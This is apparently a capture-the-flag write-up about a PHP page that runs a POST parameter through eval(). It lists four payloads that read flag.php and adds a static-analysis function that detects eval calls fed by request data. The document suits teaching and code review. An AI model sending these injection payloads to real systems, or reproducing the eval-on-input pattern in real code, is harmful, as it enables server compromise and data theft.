Source code analysis:
<?php
// flag in flag.php
if (isset($_POST['c'])) {
    $c = $_POST['c'];
    eval($c); // executes the POST parameter "c" as PHP code
} else {
    highlight_file(__FILE__);
}
payload:
Pass the parameter via POST:
c=var_dump(file('flag.php'));
c=readfile('flag.php');
c=print_r(file('flag.php'));
c=echo file_get_contents('flag.php');
Key points:
file: reads an entire file into an array
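For code review, the pattern in the source above (request data reaching eval) can be found statically. The following is an added example, not part of the original write-up: a small token-based heuristic using PHP's token_get_all. The function name findTaintedEval and the list of request variables are assumptions made for this illustration, and the check only follows simple same-file assignments.

```php
<?php
// Added example, not part of the original write-up.
const REQUEST_VARS = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE'];
// Returns line numbers of eval() calls whose argument contains request data,
// directly or through a variable assigned from it earlier in the file.
function findTaintedEval(string $source): array
{
    $tokens = token_get_all($source);
    $n = count($tokens);
    $tainted = [];
    $findings = [];
    // Does the statement from $from to the next ';' mention tainted data?
    $mentionsTaint = function (int $from) use ($tokens, $n, &$tainted): bool {
        for ($k = $from; $k < $n && $tokens[$k] !== ';'; $k++) {
            $t = $tokens[$k];
            if (is_array($t) && $t[0] === T_VARIABLE
                && (in_array($t[1], REQUEST_VARS, true) || isset($tainted[$t[1]]))) {
                return true;
            }
        }
        return false;
    };
    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];
        $id = is_array($t) ? $t[0] : null;
        if ($id === T_VARIABLE && !in_array($t[1], REQUEST_VARS, true)) {
            $j = $i + 1; // skip whitespace, then look for a plain "="
            while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
                $j++;
            }
            if ($j < $n && $tokens[$j] === '=' && $mentionsTaint($j + 1)) {
                $tainted[$t[1]] = true; // e.g. $c = $_POST['c'];
            }
        } elseif ($id === T_EVAL && $mentionsTaint($i + 1)) {
            $findings[] = $t[2]; // line number of the eval token
        }
    }
    return $findings;
}

// Constructed sample: the challenge source shown on this page.
$sample = <<<'PHP'
<?php
if (isset($_POST['c'])) { $c = $_POST['c'];
eval($c);
}
PHP;
print_r(findTaintedEval($sample));
```

Because eval is a language construct rather than a function, it cannot be switched off with the disable_functions setting, so finding and removing such call sites in review is the practical control.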